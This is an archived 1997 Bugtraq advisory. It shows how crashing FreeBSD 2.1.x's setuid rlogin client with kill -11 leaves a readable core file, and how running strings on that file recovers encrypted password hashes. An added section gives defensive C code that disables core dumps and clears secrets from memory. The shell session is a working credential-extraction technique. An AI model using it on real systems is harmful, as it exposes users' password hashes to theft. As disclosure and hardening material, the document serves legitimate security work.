FreeBSD,rlogin and coredumps.
daemon@ATHENA.MIT.EDU (Roelof W Temmingh)
Sun Feb 16 21:15:34 1997
Date: Mon, 17 Feb 1997 01:34:06 +0200
Reply-To: Roelof W Temmingh <roelof@CUBE.NANOTEQ.CO.ZA>
From: Roelof W Temmingh <roelof@CUBE.NANOTEQ.CO.ZA>
To: BUGTRAQ@NETSPACE.ORG
---------- Forwarded message ----------
If the following is already known, my deepest apologies for the junk mail..
RECONSTRUCT PARTS OF UN-SHADOWED PASSWORDFILE ON (at least) FreeBSD
2.1.0, 2.1.5:
Bronc Buster wrote:
>This exploit is very similar to the FTP exploit on BSD that creates a
>ftp.core file you can then strings and get the encrypted password file.
....snip...snip..
I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started
playing around with dump files:
~> rlogin 127.0.0.1
Password:
Last login: Mon Feb 17 00:35:49 from localhost
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996
You have new mail.
~> ps -ax | grep rlogin
6528 ?? S 0:00.06 rlogind
6527 p1 S+ 0:00.05 rlogin 127.0.0.1
6529 p1 S+ 0:00.01 rlogin 127.0.0.1
~> kill -11 6529
~> ls
Brain_Box NS cronjobs mail security
Mail News foon rlogin.core
~> strings rlogin.core > unshadowed.passwdfile.reconstruct
~> vi unshadowed.passwdfile.reconstruct
and reconstruct..
I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I
wonder if there is a way to make a core dump only readable by root, and why
this isn't the default?
=========================================================================
Roelof W Temmingh Network & Data Security
Nanoteq
rt@nanoteq.com [w] South-Africa
roelof@cube.nanoteq.co.za [ah] http://www.nanoteq.com
=========================================================================
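Added example, not from the post or from the FreeBSD rlogin source: the defensive pattern a program that holds credentials in memory (as the set-user-ID rlogin client above does) can apply itself, so that a SIGSEGV cannot leave the secret in a world-readable core file. It sets RLIMIT_CORE to zero and scrubs the secret buffer after use; the function and buffer names are illustrative. Later FreeBSD releases additionally refuse to dump set-user-ID processes unless the kern.sugid_coredump sysctl is enabled, which is the system-wide answer to the question the post ends with.

```c
#include <stdio.h>
#include <sys/resource.h>

/* Refuse to write a core file at all: soft and hard limit both 0.
 * Lowering the hard limit needs no privilege, so a setuid program
 * can do this before it ever touches a secret. */
int disable_core_dumps(void) {
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Returns 1 when the current core limit is zero (no core can be written). */
int core_limit_is_zero(void) {
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0) return 0;
    return rl.rlim_cur == 0 && rl.rlim_max == 0;
}

/* Overwrite a secret in place through a volatile pointer so the compiler
 * cannot drop the clearing as a dead store. */
void scrub(char *buf, size_t len) {
    volatile char *p = (volatile char *)buf;
    while (len--) *p++ = 0;
}

/* Returns 1 if every byte of buf is zero. */
int is_scrubbed(const char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (buf[i] != 0) return 0;
    return 1;
}

int main(void) {
    char password[64] = "hunter2";   /* constructed sample secret */
    if (disable_core_dumps() != 0) { perror("setrlimit"); return 1; }
    /* ... use password for authentication here ... */
    scrub(password, sizeof password);
    printf("core limit zero: %d, scrubbed: %d\n",
           core_limit_is_zero(), is_scrubbed(password, sizeof password));
    return 0;
}
```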